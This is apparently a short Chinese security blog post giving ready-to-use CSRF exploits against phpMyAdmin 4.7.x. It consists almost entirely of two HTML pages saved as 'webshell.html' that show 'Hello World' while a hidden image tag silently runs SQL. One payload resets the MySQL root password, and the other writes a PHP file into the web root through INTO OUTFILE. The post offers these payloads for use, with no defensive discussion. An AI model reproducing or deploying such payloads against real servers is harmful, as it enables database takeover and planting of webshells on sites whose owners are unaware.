首页 网络安全phpMyAdmin 4.7.x CSRF 漏洞利用

phpMyAdmin 4.7.x CSRF 漏洞利用

修改root密码:

保存为:webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为:www.webshell.cc

写文件

首先你要知道路径

保存为:webshell.html

 

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select%20'<?php%20phpinfo();?>'%20into%20outfile%20'/var/www/html/test.php';" style="display:none;" />


版权声明:如非注明文章皆由阿尔法凡原创,转载请注明出处!
本文链接:phpMyAdmin 4.7.x CSRF 漏洞利用
收藏本站:Ctrl+D即可收藏,期待再次光临